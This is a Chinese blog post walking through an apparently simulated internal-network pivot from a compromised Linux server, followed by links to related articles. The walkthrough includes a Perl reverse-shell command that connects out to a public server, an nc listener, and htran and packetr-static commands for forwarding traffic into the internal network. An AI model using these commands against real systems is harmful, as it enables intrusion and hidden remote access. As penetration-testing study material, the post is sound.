Linux下的内网反弹实例

最新推荐文章于 2023-01-03 15:38:38 发布
最新推荐文章于 2023-01-03 15:38:38 发布
阅读量1.7k 收藏
点赞数
分类专栏: 网络安全技术 文章标签: linux 服务器 windows 测试 perl 虚拟机

环境:

被攻陷的Linux主机(拿到root权限)-----模拟为我内网的一台Linux服务器 192.168.0.105

hack的操作用机-----我的电脑 192.168.1.101

反弹到公网的服务器-----我自己的公网服务器 61.160.2xx.xxx

渗透测试用的windows测试机   192.168.1.109

工具:

packetr-static   Linux下的

htran.exe windows下的

sockcap 用作代理进入内网渗透的利器

过程:

1.我模拟下极度苛刻的情况下的环境,该攻陷的Linux服务器对外不开放22,只存在web端口80,那么我们必须得反弹shell到公网的机器上,这点我虚拟机里面没 这个环境,我就直接说下简要的

上传back.pl文件到linux下的tmp目录下,执行

perl /tmp/back.pl xxx.xxx.xxx.xxx 端口

在公网的服务器上,运行nc执行

nc -l -v -p 端口(跟上面的一样)

现在我弹2个窗口回来,一个开代理,一个转发数据

把packetr-static传上去,执行

./packetr-static -s 1988


一个窗口转发数据,执行

./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988


2.在windows公网端执行,

htran.exe -p -listen 123 1988


3.配置sockcap


4.运行代理程序进入内网

 

linkboy2004
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux下的内网反弹实例.txt
01-09
Linux系统安全学习
python 实现socket通信实例之client.py
09-04
python 实现socket通信实例之client.py socket又称套间字或者插口,是网络通信中必不可少的工具。有道是:“无socket,不网络”。由于socket最早在BSD Unix上使用,而Unix/Linux所奉为经典的至高哲学是“一切皆是...
Linux的capability深入分析(2)
wangpengqi的专栏
08-07 1万+
一)capability的工具介绍 在我们的试验环境是RHEL6,libcap-2.16软件包中包含了相关的capability设置及查看工作,如下: rpm -ql libcap-2.16-5.2.el6.i686  /lib/libcap.so.2 /lib/libcap.so.2.16 /lib/security/pam_cap.so
linux怎么查看进程的套接字,linux – 如何找到哪个进程绑定套接字而不是监听?...
weixin_29051245的博客
04-30 132
当我使用nc来监听端口时,它会显示出来nc -l -vv -p 21000retrying local 0.0.0.0:21000 : Address already in use Can't grab 0.0.0.0:21000 with bind但是我无法使用工具netstat / ss找到哪个任务占用了这个端口netstat -an|grep 21000没有找到ss -a|grep 2100...
netcat下载
最新发布
weixin_35755188的博客
01-03 497
Netcat是一款著名的网络工具,可以用于连接、分析、调试网络中的数据。它可以作为客户端和服务端使用,可以用来发送数据、文件或者执行命令。 要下载Netcat,你可以在网上搜索Netcat下载链接,然后选择适合你系统的版本下载。你也可以在命令行中输入以下命令来安装Netcat: sudo apt-get install netcat 注意:这条命令只适用于使用apt包管理器的Linux系统。如果...
[转载] Linux的capability深入分析
a172742451的专栏
04-21 2716
[转载] Linux的capability深入分析 一)概述: 1)从2.1版开始,Linux内核有了能力(capability)的概念,即它打破了UNIX/LINUX操作系统中超级用户/普通用户的概念,由普通用户也可以做只有超级用户可以完成的工作. 2)capability可以作用在进程上(受限),也可以作用在程序文件上,它与sudo不同,sudo只针对用户/程序/文件的概
python 实现socket通信实例之server.py
09-04
python 实现socket通信实例之server.py socket又称套间字或者插口,是网络通信中必不可少的工具。有道是:“无socket,不网络”。由于socket最早在BSD Unix上使用,而Unix/Linux所奉为经典的至高哲学是“一切皆是...
Nginx 启动报 [emerg] bind() to 0.0.0.0:XXXX failed (13: Permission denied)错误处理
热门推荐
RunSnail的博客
07-24 4万+
 系统启动Nginx后,报 [emerg] bind() to 0.0.0.0:XXXX failed (13: Permission denied)错误的处理方式,分为两种: 第一种:端口小于1024的情况: [emerg] bind() to 0.0.0.0:80 failed (13: Permission denied) 原因是1024以下端口启动时需要root权限,所以sudo ...
linux nc 命令详解
weixin_33969116的博客
05-23 206
linux nc 命令详解 功能说明:设置路由器。 语  法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...] 补充说明:执行本指令可
could not bind to address 0.0.0.0:443 no listening sockets available, shutting d
weixin_34019929的博客
04-07 241
2019独角兽企业重金招聘Python工程师标准>>> ...
ssh隧道转发内网穿透功能实现(反弹式木-马原理)
weixin_34390105的博客
04-21 708
ssh说明 SSH(secure shell)是一种加密的网络传输协议,可在不安全的网络中为网络服务提供安全的传输环境(这点很重要);SSH通过在网络中创建安全隧道来实现SSH客户端与服务器之间的连接。人们通常利用SSH来传输命令行界面和远程执行命令;SSH也支持隧道协议、端口映射和X11连接。借助SFTP或SCP协议还可以传输文件等;闲话不说了,如需要详细了解ssh请自行搜索;我们通常接触最多的...
docker nginx 启动失败,报错 listen tcp 0.0.0.0:80: bind: address already in use
金戈铁马
11-26 2万+
详细错误如下: Starting new_nginx_1 ...  Starting new_nginx_1 ... error ERROR: for new_nginx_1  Cannot start service nginx: driver failed programming external connectivity on endpoint new_nginx_1 (ec53e5b0...
linux输入nc命令后unknown,Linux nc命令_Linux 教程_服务器相关_教程_教程_JSON在线解析及格式化验证 - JSON.cn...
weixin_39790510的博客
05-05 2011
Linux nc命令用于设置路由器。执行本指令可设置路由器的相关参数。语法nc [-hlnruz][-g][-G][-i][-o][-p][-s][-v...][-w][主机名称][通信端口...]参数说明:-g 设置路由器跃程通信网关,最多可设置8个。-G 设置来源路由指向器,其数值为4的倍数。-h 在线帮助。-i 设置时间间隔,以便传送信息及扫描通信端口。-l 使用监听模式...
Linux渗透之反弹Shell命令解析
deeplearnings的博客
08-18 9874
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 B
Linux Centos7 listen tcp 0.0.0.0:15672: bind: address already in use 端口被占用,解决办法
路西法Lucifer
10-22 2万+
问题:       从下图可以看到15672的端口被占用了,那怎么解决呢???  解决: netstat -nap 查看程序运行的pid,查找15672端口,可以发现确实被占用了,记住PID 当然也可以直接找到某个端口是否被占用,命令:netstat -nap | grep 15672 kill PID,杀死该进程 ,这里是kill 2407    ...
Linux内网反弹技巧总结与杂谈
u014389734的博客
07-08 1044
靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发或映射等方式对外,当可以执行命令的服务器能够访问公网(这个要看具体情况,比如需要加载公网资源或者其他需求)时,反连技巧就会派上用场。通常,在做渗透的时候会“运气好”,碰到某些应用上存在远程命令执行漏洞,近来由于java反序列化和二进类漏洞的层出不穷,也加持着这种漏洞越发增多。一般来说,靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发...
Perl写的反弹Shell [转]
stonesharp的专栏
12-31 2859
Perl写的反弹Shell [转] 说明:这个反弹shell的代码来自 anonymouslogin 的百度空间,无意中看到,用于Linux下面,和以前我在POC上看到的一个 comeback.pl代码很像很像    本人暂时没有测试 手头没有的Linux机子... 代码是我自己加上去的 laiwei@debian:~$ cat rebound.pl           
反弹木马——本质上就是一个开80端口的CS程序,伪造自己在浏览网页
djph26741的博客
10-11 439
反弹端口型木马分析了防火墙的特性后发现:防火墙对于连入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。于是,与一般的木马相反,反弹端口型木马的服务端(被控端)使用主动端口,客户端(控端)使用被动端口,木马定时监测控端的存在,发现控端上线立即弹出端口主动连结控端打开的主动端口,为了隐蔽起见,控端的被动端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端...
Linux内网渗透:反弹shell技术详解
"这份学习笔记整合了多种反弹shell的方法,包括bash反弹、telnet反弹和nc反弹,主要面向网络安全和内网渗透领域的学习者。内容详尽地介绍了各种反弹shell的命令行操作,适用于Linux环境,并提醒注意不同发行版可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值